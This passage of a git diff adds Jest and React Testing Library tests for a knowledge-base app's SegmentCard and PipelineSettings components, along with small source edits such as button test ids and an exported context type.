expect(onClick).not.toHaveBeenCalled() + }) + + it('should call onClick when view more button is clicked in full-doc mode', () => { + const onClick = jest.fn() + const detail = createMockSegmentDetail() + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + + render() + + const viewMoreButton = screen.getByRole('button', { name: /viewMore/i }) + fireEvent.click(viewMoreButton) + + expect(onClick).toHaveBeenCalledTimes(1) + }) + + it('should call onClickEdit when edit button is clicked', () => { + const onClickEdit = jest.fn() + const detail = createMockSegmentDetail() + + render( + , + ) + + const editButton = screen.getByTestId('segment-edit-button') + fireEvent.click(editButton) + + expect(onClickEdit).toHaveBeenCalledTimes(1) + }) + + it('should call onDelete when confirm delete is clicked', async () => { + const onDelete = jest.fn().mockResolvedValue(undefined) + const detail = createMockSegmentDetail({ id: 'test-segment-id' }) + + render( + , + ) + + const deleteButton = screen.getByTestId('segment-delete-button') + fireEvent.click(deleteButton) + + await waitFor(() => { + expect(screen.getByText('datasetDocuments.segment.delete')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByText('common.operation.sure')) + + await waitFor(() => { + expect(onDelete).toHaveBeenCalledWith('test-segment-id') + }) + }) + + it('should call onChangeSwitch when switch is toggled', async () => { + const onChangeSwitch = jest.fn().mockResolvedValue(undefined) + const detail = createMockSegmentDetail({ id: 'test-segment-id', enabled: true, status: 'completed' }) + + render( + , + ) + + const switchElement = screen.getByRole('switch') + fireEvent.click(switchElement) + + await waitFor(() => { + expect(onChangeSwitch).toHaveBeenCalledWith(false, 'test-segment-id') + }) + }) + + it('should stop propagation when edit button is clicked', () => { + const onClick = jest.fn() + const onClickEdit = jest.fn() + const detail = createMockSegmentDetail() + + render( + , + ) + + const editButton = screen.getByTestId('segment-edit-button') + fireEvent.click(editButton) + + expect(onClickEdit).toHaveBeenCalledTimes(1) + expect(onClick).not.toHaveBeenCalled() + }) + + it('should stop propagation when switch area is clicked', () => { + const onClick = jest.fn() + const detail = createMockSegmentDetail({ status: 'completed' }) + + render( + , + ) + + const switchElement = screen.getByRole('switch') + const switchContainer = switchElement.parentElement + fireEvent.click(switchContainer!) + + expect(onClick).not.toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // Memoization Logic Tests + // -------------------------------------------------------------------------- + describe('Memoization Logic', () => { + it('should compute isGeneralMode correctly for text mode - show keywords', () => { + mockDocForm.current = ChunkingMode.text + const detail = createMockSegmentDetail({ keywords: ['testkeyword'] }) + + render() + + expect(screen.getByText('testkeyword')).toBeInTheDocument() + }) + + it('should compute isGeneralMode correctly for non-text mode - hide keywords', () => { + mockDocForm.current = ChunkingMode.qa + const detail = createMockSegmentDetail({ keywords: ['testkeyword'] }) + + render() + + expect(screen.queryByText('testkeyword')).not.toBeInTheDocument() + }) + + it('should compute isParentChildMode correctly - show parent chunk prefix', () => { + mockDocForm.current = ChunkingMode.parentChild + const detail = createMockSegmentDetail() + + render() + + expect(screen.getByText(/datasetDocuments\.segment\.parentChunk/i)).toBeInTheDocument() + }) + + it('should compute isFullDocMode correctly - show view more button', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + const detail = createMockSegmentDetail() + + render() + + expect(screen.getByText('common.operation.viewMore')).toBeInTheDocument() + }) + + it('should compute isParagraphMode correctly and show child chunks', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'paragraph' + const childChunks = [createMockChildChunk()] + const detail = createMockSegmentDetail({ child_chunks: childChunks }) + + render() + + // ChildSegmentList should render + expect(screen.getByText(/child chunk/i)).toBeInTheDocument() + }) + + it('should compute chunkEdited correctly when updated_at > created_at', () => { + mockDocForm.current = ChunkingMode.text + const detail = createMockSegmentDetail({ + created_at: 1700000000, + updated_at: 1700000001, + }) + + render() + + expect(screen.getByText('datasetDocuments.segment.edited')).toBeInTheDocument() + }) + + it('should not show edited badge when timestamps are equal', () => { + mockDocForm.current = ChunkingMode.text + const detail = createMockSegmentDetail({ + created_at: 1700000000, + updated_at: 1700000000, + }) + + render() + + expect(screen.queryByText('datasetDocuments.segment.edited')).not.toBeInTheDocument() + }) + + it('should not show edited badge in full-doc mode', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + const detail = createMockSegmentDetail({ + created_at: 1700000000, + updated_at: 1700000001, + }) + + render() + + expect(screen.queryByText('datasetDocuments.segment.edited')).not.toBeInTheDocument() + }) + + it('should compute contentOpacity correctly when enabled', () => { + const detail = createMockSegmentDetail({ enabled: true }) + + const { container } = render() + + const wordCount = container.querySelector('.system-xs-medium.text-text-tertiary') + expect(wordCount).not.toHaveClass('opacity-50') + }) + + it('should compute contentOpacity correctly when disabled', () => { + const detail = createMockSegmentDetail({ enabled: false }) + + render() + + // ChunkContent receives opacity class when disabled + const markdown = screen.getByTestId('markdown') + expect(markdown).toHaveClass('opacity-50') + }) + + it('should not apply opacity when disabled but focused', () => { + const detail = createMockSegmentDetail({ enabled: false }) + + const { container } = render( + , + ) + + const wordCount = container.querySelector('.system-xs-medium.text-text-tertiary') + expect(wordCount).not.toHaveClass('opacity-50') + }) + + it('should compute wordCountText with correct format for singular', () => { + const detail = createMockSegmentDetail({ word_count: 1 }) + + render() + + expect(screen.getByText('1 character')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Mode-specific Rendering Tests + // -------------------------------------------------------------------------- + describe('Mode-specific Rendering', () => { + it('should render without padding classes in full-doc mode', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + const detail = createMockSegmentDetail() + + render() + + const card = screen.getByTestId('segment-card') + expect(card).not.toHaveClass('pb-2') + expect(card).not.toHaveClass('pt-2.5') + }) + + it('should render with hover classes in non full-doc mode', () => { + mockDocForm.current = ChunkingMode.text + const detail = createMockSegmentDetail() + + render() + + const card = screen.getByTestId('segment-card') + expect(card).toHaveClass('pb-2') + expect(card).toHaveClass('pt-2.5') + }) + + it('should not render status item in full-doc mode', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + const detail = createMockSegmentDetail() + + render() + + // In full-doc mode, status item should not render + expect(screen.queryByText('Status:')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Child Segment List Tests + // -------------------------------------------------------------------------- + describe('Child Segment List', () => { + it('should render ChildSegmentList when in paragraph mode with child chunks', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'paragraph' + const childChunks = [createMockChildChunk(), createMockChildChunk({ id: 'child-2', position: 2 })] + const detail = createMockSegmentDetail({ child_chunks: childChunks }) + + render() + + expect(screen.getByText(/2 child chunks/i)).toBeInTheDocument() + }) + + it('should not render ChildSegmentList when child_chunks is empty', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'paragraph' + const detail = createMockSegmentDetail({ child_chunks: [] }) + + render() + + expect(screen.queryByText(/child chunk/i)).not.toBeInTheDocument() + }) + + it('should not render ChildSegmentList in full-doc mode', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + const childChunks = [createMockChildChunk()] + const detail = createMockSegmentDetail({ child_chunks: childChunks }) + + render() + + // In full-doc mode, ChildSegmentList should not render + expect(screen.queryByText(/1 child chunk$/i)).not.toBeInTheDocument() + }) + + it('should call handleAddNewChildChunk when add button is clicked', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'paragraph' + const handleAddNewChildChunk = jest.fn() + const childChunks = [createMockChildChunk()] + const detail = createMockSegmentDetail({ id: 'parent-id', child_chunks: childChunks }) + + render( + , + ) + + const addButton = screen.getByText('common.operation.add') + fireEvent.click(addButton) + + expect(handleAddNewChildChunk).toHaveBeenCalledWith('parent-id') + }) + }) + + // -------------------------------------------------------------------------- + // Keywords Display Tests + // -------------------------------------------------------------------------- + describe('Keywords Display', () => { + it('should render keywords with # prefix in general mode', () => { + mockDocForm.current = ChunkingMode.text + const detail = createMockSegmentDetail({ keywords: ['keyword1', 'keyword2'] }) + + const { container } = render() + + expect(screen.getByText('keyword1')).toBeInTheDocument() + expect(screen.getByText('keyword2')).toBeInTheDocument() + // Tag component shows # prefix + const hashtags = container.querySelectorAll('.text-text-quaternary') + expect(hashtags.length).toBeGreaterThan(0) + }) + + it('should not render keywords in QA mode', () => { + mockDocForm.current = ChunkingMode.qa + const detail = createMockSegmentDetail({ keywords: ['keyword1'] }) + + render() + + expect(screen.queryByText('keyword1')).not.toBeInTheDocument() + }) + + it('should not render keywords in parent-child mode', () => { + mockDocForm.current = ChunkingMode.parentChild + const detail = createMockSegmentDetail({ keywords: ['keyword1'] }) + + render() + + expect(screen.queryByText('keyword1')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Images Display Tests + // -------------------------------------------------------------------------- + describe('Images Display', () => { + it('should render ImageList when attachments exist', () => { + const attachments = [createMockAttachment()] + const detail = createMockSegmentDetail({ attachments }) + + render() + + // ImageList uses FileThumb which renders images + expect(screen.getByAltText('test-image.png')).toBeInTheDocument() + }) + + it('should not render ImageList when attachments is empty', () => { + const detail = createMockSegmentDetail({ attachments: [] }) + + render() + + expect(screen.queryByAltText('test-image.png')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases and Error Handling Tests + // -------------------------------------------------------------------------- + describe('Edge Cases and Error Handling', () => { + it('should handle undefined detail gracefully', () => { + render() + + expect(screen.getByText(/Chunk/i)).toBeInTheDocument() + }) + + it('should handle empty detail object gracefully', () => { + render() + + expect(screen.getByText(/Chunk/i)).toBeInTheDocument() + }) + + it('should handle missing callback functions gracefully', () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + const card = screen.getByTestId('segment-card') + expect(() => fireEvent.click(card)).not.toThrow() + }) + + it('should handle switch being disabled when status is not completed', () => { + const detail = createMockSegmentDetail({ status: 'indexing' }) + + render( + , + ) + + // The Switch component uses CSS classes for disabled state, not the native disabled attribute + const switchElement = screen.getByRole('switch') + expect(switchElement).toHaveClass('!cursor-not-allowed', '!opacity-50') + }) + + it('should handle zero word count', () => { + const detail = createMockSegmentDetail({ word_count: 0 }) + + render() + + expect(screen.getByText('0 characters')).toBeInTheDocument() + }) + + it('should handle zero hit count', () => { + const detail = createMockSegmentDetail({ hit_count: 0 }) + + render() + + expect(screen.getByText('0 datasetDocuments.segment.hitCount')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + const longContent = 'A'.repeat(10000) + // ChunkContent shows sign_content first, so set it to the long content + const detail = createMockSegmentDetail({ sign_content: longContent }) + + render() + + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Component Integration Tests + // -------------------------------------------------------------------------- + describe('Component Integration', () => { + it('should render real Tag component with hashtag styling', () => { + mockDocForm.current = ChunkingMode.text + const detail = createMockSegmentDetail({ keywords: ['testkeyword'] }) + + render() + + expect(screen.getByText('testkeyword')).toBeInTheDocument() + }) + + it('should render real Divider component', () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + const dividers = document.querySelectorAll('.bg-divider-regular') + expect(dividers.length).toBeGreaterThan(0) + }) + + it('should render real Badge component when edited', () => { + mockDocForm.current = ChunkingMode.text + const detail = createMockSegmentDetail({ + created_at: 1700000000, + updated_at: 1700000001, + }) + + render() + + const editedBadge = screen.getByText('datasetDocuments.segment.edited') + expect(editedBadge).toHaveClass('system-2xs-medium-uppercase') + }) + + it('should render real Switch component with correct enabled state', () => { + const detail = createMockSegmentDetail({ enabled: true, status: 'completed' }) + + render( + , + ) + + const switchElement = screen.getByRole('switch') + expect(switchElement).toHaveClass('bg-components-toggle-bg') + }) + + it('should render real Switch component with unchecked state', () => { + const detail = createMockSegmentDetail({ enabled: false, status: 'completed' }) + + render( + , + ) + + const switchElement = screen.getByRole('switch') + expect(switchElement).toHaveClass('bg-components-toggle-bg-unchecked') + }) + + it('should render real SegmentIndexTag with position formatting', () => { + const detail = createMockSegmentDetail({ position: 1 }) + + render() + + expect(screen.getByText(/Chunk-01/i)).toBeInTheDocument() + }) + + it('should render real SegmentIndexTag with double digit position', () => { + const detail = createMockSegmentDetail({ position: 12 }) + + render() + + expect(screen.getByText(/Chunk-12/i)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // All Props Variations Tests + // -------------------------------------------------------------------------- + describe('All Props Variations', () => { + it('should render correctly with all props provided', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'paragraph' + const childChunks = [createMockChildChunk()] + const attachments = [createMockAttachment()] + const detail = createMockSegmentDetail({ + id: 'full-props-segment', + position: 10, + sign_content: 'Full signed content', + content: 'Full content', + word_count: 500, + hit_count: 25, + enabled: true, + keywords: ['key1', 'key2'], + child_chunks: childChunks, + attachments, + created_at: 1700000000, + updated_at: 1700000001, + status: 'completed', + }) + + render( + , + ) + + // ChunkContent shows sign_content first + expect(screen.getByText('Full signed content')).toBeInTheDocument() + expect(screen.getByRole('switch')).toBeInTheDocument() + }) + + it('should render correctly with minimal props', () => { + render() + + expect(screen.getByText('common.operation.viewMore')).toBeInTheDocument() + }) + + it('should handle loading transition correctly', () => { + const detail = createMockSegmentDetail() + + const { rerender } = render() + + // When loading, content should not be visible + expect(screen.queryByText('Test signed content')).not.toBeInTheDocument() + + rerender() + + // ChunkContent shows sign_content first + expect(screen.getByText('Test signed content')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // ChunkContent QA Mode Tests - cover lines 25-49 + // -------------------------------------------------------------------------- + describe('ChunkContent QA Mode', () => { + it('should render Q and A sections when answer is provided', () => { + const detail = createMockSegmentDetail({ + content: 'This is the question content', + answer: 'This is the answer content', + sign_content: '', + }) + + render() + + // Should render Q label + expect(screen.getByText('Q')).toBeInTheDocument() + // Should render A label + expect(screen.getByText('A')).toBeInTheDocument() + // Should render question content + expect(screen.getByText('This is the question content')).toBeInTheDocument() + // Should render answer content + expect(screen.getByText('This is the answer content')).toBeInTheDocument() + }) + + it('should apply line-clamp-2 class when isCollapsed is true in QA mode', () => { + mockIsCollapsed.current = true + const detail = createMockSegmentDetail({ + content: 'Question content', + answer: 'Answer content', + sign_content: '', + }) + + render() + + // Markdown components should have line-clamp-2 class when collapsed + const markdowns = screen.getAllByTestId('markdown') + markdowns.forEach((markdown) => { + expect(markdown).toHaveClass('line-clamp-2') + }) + }) + + it('should apply line-clamp-20 class when isCollapsed is false in QA mode', () => { + mockIsCollapsed.current = false + const detail = createMockSegmentDetail({ + content: 'Question content', + answer: 'Answer content', + sign_content: '', + }) + + render() + + // Markdown components should have line-clamp-20 class when not collapsed + const markdowns = screen.getAllByTestId('markdown') + markdowns.forEach((markdown) => { + expect(markdown).toHaveClass('line-clamp-20') + }) + }) + + it('should render QA mode with className applied to wrapper', () => { + const detail = createMockSegmentDetail({ + content: 'Question', + answer: 'Answer', + sign_content: '', + enabled: false, + }) + + const { container } = render() + + // The ChunkContent wrapper should have opacity class when disabled + const qaWrapper = container.querySelector('.flex.gap-x-1') + expect(qaWrapper).toBeInTheDocument() + }) + + it('should not render QA mode when answer is empty string', () => { + const detail = createMockSegmentDetail({ + content: 'Regular content', + answer: '', + sign_content: 'Signed content', + }) + + render() + + // Should not render Q and A labels + expect(screen.queryByText('Q')).not.toBeInTheDocument() + expect(screen.queryByText('A')).not.toBeInTheDocument() + // Should render signed content instead + expect(screen.getByText('Signed content')).toBeInTheDocument() + }) + + it('should not render QA mode when answer is undefined', () => { + const detail = createMockSegmentDetail({ + content: 'Regular content', + answer: undefined, + sign_content: 'Signed content', + }) + + render() + + // Should not render Q and A labels + expect(screen.queryByText('Q')).not.toBeInTheDocument() + expect(screen.queryByText('A')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // ChunkContent Non-QA Mode Tests - ensure full coverage + // -------------------------------------------------------------------------- + describe('ChunkContent Non-QA Mode', () => { + it('should apply line-clamp-3 in fullDocMode', () => { + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + const detail = createMockSegmentDetail({ + sign_content: 'Content in full doc mode', + }) + + render() + + const markdown = screen.getByTestId('markdown') + expect(markdown).toHaveClass('line-clamp-3') + }) + + it('should apply line-clamp-2 when not fullDocMode and isCollapsed is true', () => { + mockDocForm.current = ChunkingMode.text + mockIsCollapsed.current = true + const detail = createMockSegmentDetail({ + sign_content: 'Collapsed content', + }) + + render() + + const markdown = screen.getByTestId('markdown') + expect(markdown).toHaveClass('line-clamp-2') + }) + + it('should apply line-clamp-20 when not fullDocMode and isCollapsed is false', () => { + mockDocForm.current = ChunkingMode.text + mockIsCollapsed.current = false + const detail = createMockSegmentDetail({ + sign_content: 'Expanded content', + }) + + render() + + const markdown = screen.getByTestId('markdown') + expect(markdown).toHaveClass('line-clamp-20') + }) + + it('should fall back to content when sign_content is empty', () => { + const detail = createMockSegmentDetail({ + content: 'Fallback content', + sign_content: '', + }) + + render() + + expect(screen.getByText('Fallback content')).toBeInTheDocument() + }) + + it('should render empty string when both sign_content and content are empty', () => { + const detail = createMockSegmentDetail({ + content: '', + sign_content: '', + }) + + render() + + const markdown = screen.getByTestId('markdown') + expect(markdown).toHaveTextContent('') + }) + }) +}) diff --git a/web/app/components/datasets/documents/detail/completed/segment-card/index.tsx b/web/app/components/datasets/documents/detail/completed/segment-card/index.tsx index 679a0ec777..ce24b843de 100644 --- a/web/app/components/datasets/documents/detail/completed/segment-card/index.tsx +++ b/web/app/components/datasets/documents/detail/completed/segment-card/index.tsx @@ -129,6 +129,7 @@ const SegmentCard: FC = ({ return (
= ({ popupClassName='text-text-secondary system-xs-medium' >
{ e.stopPropagation() @@ -184,7 +186,9 @@ const SegmentCard: FC = ({ popupContent='Delete' popupClassName='text-text-secondary system-xs-medium' > -
{ e.stopPropagation() setShowModal(true) diff --git a/web/app/components/datasets/documents/detail/completed/skeleton/parent-chunk-card-skeleton.tsx b/web/app/components/datasets/documents/detail/completed/skeleton/parent-chunk-card-skeleton.tsx index f22024bb8e..b013d952a7 100644 --- a/web/app/components/datasets/documents/detail/completed/skeleton/parent-chunk-card-skeleton.tsx +++ b/web/app/components/datasets/documents/detail/completed/skeleton/parent-chunk-card-skeleton.tsx @@ -10,7 +10,7 @@ import { const ParentChunkCardSkelton = () => { const { t } = useTranslation() return ( -
+
diff --git a/web/app/components/datasets/documents/detail/context.ts b/web/app/components/datasets/documents/detail/context.ts index 1d6f121d6b..ae737994d9 100644 --- a/web/app/components/datasets/documents/detail/context.ts +++ b/web/app/components/datasets/documents/detail/context.ts @@ -1,7 +1,7 @@ import type { ChunkingMode, ParentMode } from '@/models/datasets' import { createContext, useContextSelector } from 'use-context-selector' -type DocumentContextValue = { +export type DocumentContextValue = { datasetId?: string documentId?: string docForm?: ChunkingMode diff --git a/web/app/components/datasets/documents/detail/settings/pipeline-settings/index.spec.tsx b/web/app/components/datasets/documents/detail/settings/pipeline-settings/index.spec.tsx new file mode 100644 index 0000000000..79968b5b24 --- /dev/null +++ b/web/app/components/datasets/documents/detail/settings/pipeline-settings/index.spec.tsx @@ -0,0 +1,786 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' +import PipelineSettings from './index' +import { DatasourceType } from '@/models/pipeline' +import type { PipelineExecutionLogResponse } from '@/models/pipeline' + +// Mock i18n +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +// Mock Next.js router +const mockPush = jest.fn() +const mockBack = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + back: mockBack, + }), +})) + +// Mock dataset detail context +const mockPipelineId = 'pipeline-123' +jest.mock('@/context/dataset-detail', () => ({ + useDatasetDetailContextWithSelector: (selector: (state: { dataset: { pipeline_id: string; doc_form: string } }) => unknown) => + selector({ dataset: { pipeline_id: mockPipelineId, doc_form: 'text_model' } }), +})) + +// Mock API hooks for PipelineSettings +const mockUsePipelineExecutionLog = jest.fn() +const mockMutateAsync = jest.fn() +const mockUseRunPublishedPipeline = jest.fn() +jest.mock('@/service/use-pipeline', () => ({ + usePipelineExecutionLog: (params: { dataset_id: string; document_id: string }) => mockUsePipelineExecutionLog(params), + useRunPublishedPipeline: () => mockUseRunPublishedPipeline(), + // For ProcessDocuments component + usePublishedPipelineProcessingParams: () => ({ + data: { variables: [] }, + isFetching: false, + }), +})) + +// Mock document invalidation hooks +const mockInvalidDocumentList = jest.fn() +const mockInvalidDocumentDetail = jest.fn() +jest.mock('@/service/knowledge/use-document', () => ({ + useInvalidDocumentList: () => mockInvalidDocumentList, + useInvalidDocumentDetail: () => mockInvalidDocumentDetail, +})) + +// Mock Form component in ProcessDocuments - internal dependencies are too complex +jest.mock('../../../create-from-pipeline/process-documents/form', () => { + return function MockForm({ + ref, + initialData, + configurations, + onSubmit, + onPreview, + isRunning, + }: { + ref: React.RefObject<{ submit: () => void }> + initialData: Record + configurations: Array<{ variable: string; label: string; type: string }> + schema: unknown + onSubmit: (data: Record) => void + onPreview: () => void + isRunning: boolean + }) { + if (ref && typeof ref === 'object' && 'current' in ref) { + (ref as React.MutableRefObject<{ submit: () => void }>).current = { + submit: () => onSubmit(initialData), + } + } + return ( + { + e.preventDefault() + onSubmit(initialData) + }} + > + {configurations.map((config, index) => ( +
+ +
+ ))} + + + ) + } +}) + +// Mock ChunkPreview - has complex internal state and many dependencies +jest.mock('../../../create-from-pipeline/preview/chunk-preview', () => { + return function MockChunkPreview({ + dataSourceType, + localFiles, + onlineDocuments, + websitePages, + onlineDriveFiles, + isIdle, + isPending, + estimateData, + }: { + dataSourceType: string + localFiles: unknown[] + onlineDocuments: unknown[] + websitePages: unknown[] + onlineDriveFiles: unknown[] + isIdle: boolean + isPending: boolean + estimateData: unknown + }) { + return ( +
+ {dataSourceType} + {localFiles.length} + {onlineDocuments.length} + {websitePages.length} + {onlineDriveFiles.length} + {String(isIdle)} + {String(isPending)} + {String(!!estimateData)} +
+ ) + } +}) + +// Test utilities +const createQueryClient = () => + new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, + }) + +const renderWithProviders = (ui: React.ReactElement) => { + const queryClient = createQueryClient() + return render( + + {ui} + , + ) +} + +// Factory functions for test data +const createMockExecutionLogResponse = ( + overrides: Partial = {}, +): PipelineExecutionLogResponse => ({ + datasource_type: DatasourceType.localFile, + input_data: { chunk_size: '100' }, + datasource_node_id: 'datasource-node-1', + datasource_info: { + related_id: 'file-1', + name: 'test-file.pdf', + extension: 'pdf', + }, + ...overrides, +}) + +const createDefaultProps = () => ({ + datasetId: 'dataset-123', + documentId: 'document-456', +}) + +describe('PipelineSettings', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPush.mockClear() + mockBack.mockClear() + mockMutateAsync.mockClear() + mockInvalidDocumentList.mockClear() + mockInvalidDocumentDetail.mockClear() + + // Default: successful data fetch + mockUsePipelineExecutionLog.mockReturnValue({ + data: createMockExecutionLogResponse(), + isFetching: false, + isError: false, + }) + + // Default: useRunPublishedPipeline mock + mockUseRunPublishedPipeline.mockReturnValue({ + mutateAsync: mockMutateAsync, + isIdle: true, + isPending: false, + }) + }) + + // ==================== Rendering Tests ==================== + // Test basic rendering with real components + describe('Rendering', () => { + it('should render without crashing when data is loaded', () => { + // Arrange + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - Real LeftHeader should render with correct content + expect(screen.getByText('datasetPipeline.documentSettings.title')).toBeInTheDocument() + expect(screen.getByText('datasetPipeline.addDocuments.steps.processDocuments')).toBeInTheDocument() + // Real ProcessDocuments should render + expect(screen.getByTestId('process-form')).toBeInTheDocument() + // ChunkPreview should render + expect(screen.getByTestId('chunk-preview')).toBeInTheDocument() + }) + + it('should render Loading component when fetching data', () => { + // Arrange + mockUsePipelineExecutionLog.mockReturnValue({ + data: undefined, + isFetching: true, + isError: false, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - Loading component should be rendered, not main content + expect(screen.queryByText('datasetPipeline.documentSettings.title')).not.toBeInTheDocument() + expect(screen.queryByTestId('process-form')).not.toBeInTheDocument() + }) + + it('should render AppUnavailable when there is an error', () => { + // Arrange + mockUsePipelineExecutionLog.mockReturnValue({ + data: undefined, + isFetching: false, + isError: true, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - AppUnavailable should be rendered + expect(screen.queryByText('datasetPipeline.documentSettings.title')).not.toBeInTheDocument() + }) + + it('should render container with correct CSS classes', () => { + // Arrange + const props = createDefaultProps() + + // Act + const { container } = renderWithProviders() + + // Assert + const mainContainer = container.firstChild as HTMLElement + expect(mainContainer).toHaveClass('relative', 'flex', 'min-w-[1024px]') + }) + }) + + // ==================== LeftHeader Integration ==================== + // Test real LeftHeader component behavior + describe('LeftHeader Integration', () => { + it('should render LeftHeader with title prop', () => { + // Arrange + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - LeftHeader displays the title + expect(screen.getByText('datasetPipeline.documentSettings.title')).toBeInTheDocument() + }) + + it('should render back button in LeftHeader', () => { + // Arrange + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - Back button should exist with proper aria-label + const backButton = screen.getByRole('button', { name: 'common.operation.back' }) + expect(backButton).toBeInTheDocument() + }) + + it('should call router.back when back button is clicked', () => { + // Arrange + const props = createDefaultProps() + + // Act + renderWithProviders() + const backButton = screen.getByRole('button', { name: 'common.operation.back' }) + fireEvent.click(backButton) + + // Assert + expect(mockBack).toHaveBeenCalledTimes(1) + }) + }) + + // ==================== Props Testing ==================== + describe('Props', () => { + it('should pass datasetId and documentId to usePipelineExecutionLog', () => { + // Arrange + const props = { datasetId: 'custom-dataset', documentId: 'custom-document' } + + // Act + renderWithProviders() + + // Assert + expect(mockUsePipelineExecutionLog).toHaveBeenCalledWith({ + dataset_id: 'custom-dataset', + document_id: 'custom-document', + }) + }) + }) + + // ==================== Memoization - Data Transformation ==================== + describe('Memoization - Data Transformation', () => { + it('should transform localFile datasource correctly', () => { + // Arrange + const mockData = createMockExecutionLogResponse({ + datasource_type: DatasourceType.localFile, + datasource_info: { + related_id: 'file-123', + name: 'document.pdf', + extension: 'pdf', + }, + }) + mockUsePipelineExecutionLog.mockReturnValue({ + data: mockData, + isFetching: false, + isError: false, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('local-files-count')).toHaveTextContent('1') + expect(screen.getByTestId('datasource-type')).toHaveTextContent(DatasourceType.localFile) + }) + + it('should transform websiteCrawl datasource correctly', () => { + // Arrange + const mockData = createMockExecutionLogResponse({ + datasource_type: DatasourceType.websiteCrawl, + datasource_info: { + content: 'Page content', + description: 'Page description', + source_url: 'https://example.com/page', + title: 'Page Title', + }, + }) + mockUsePipelineExecutionLog.mockReturnValue({ + data: mockData, + isFetching: false, + isError: false, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('website-pages-count')).toHaveTextContent('1') + expect(screen.getByTestId('local-files-count')).toHaveTextContent('0') + }) + + it('should transform onlineDocument datasource correctly', () => { + // Arrange + const mockData = createMockExecutionLogResponse({ + datasource_type: DatasourceType.onlineDocument, + datasource_info: { + workspace_id: 'workspace-1', + page: { page_id: 'page-1', page_name: 'Notion Page' }, + }, + }) + mockUsePipelineExecutionLog.mockReturnValue({ + data: mockData, + isFetching: false, + isError: false, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('online-documents-count')).toHaveTextContent('1') + }) + + it('should transform onlineDrive datasource correctly', () => { + // Arrange + const mockData = createMockExecutionLogResponse({ + datasource_type: DatasourceType.onlineDrive, + datasource_info: { id: 'drive-1', type: 'doc', name: 'Google Doc', size: 1024 }, + }) + mockUsePipelineExecutionLog.mockReturnValue({ + data: mockData, + isFetching: false, + isError: false, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('online-drive-files-count')).toHaveTextContent('1') + }) + }) + + // ==================== User Interactions - Process ==================== + describe('User Interactions - Process', () => { + it('should trigger form submit when process button is clicked', async () => { + // Arrange + mockMutateAsync.mockResolvedValue({}) + const props = createDefaultProps() + + // Act + renderWithProviders() + // Find the "Save and Process" button (from real ProcessDocuments > Actions) + const processButton = screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' }) + fireEvent.click(processButton) + + // Assert + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalled() + }) + }) + + it('should call handleProcess with is_preview=false', async () => { + // Arrange + mockMutateAsync.mockResolvedValue({}) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith( + expect.objectContaining({ + is_preview: false, + pipeline_id: mockPipelineId, + original_document_id: 'document-456', + }), + expect.any(Object), + ) + }) + }) + + it('should navigate to documents list after successful process', async () => { + // Arrange + mockMutateAsync.mockImplementation((_request, options) => { + options?.onSuccess?.() + return Promise.resolve({}) + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert + await waitFor(() => { + expect(mockPush).toHaveBeenCalledWith('/datasets/dataset-123/documents') + }) + }) + + it('should invalidate document cache after successful process', async () => { + // Arrange + mockMutateAsync.mockImplementation((_request, options) => { + options?.onSuccess?.() + return Promise.resolve({}) + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert + await waitFor(() => { + expect(mockInvalidDocumentList).toHaveBeenCalled() + 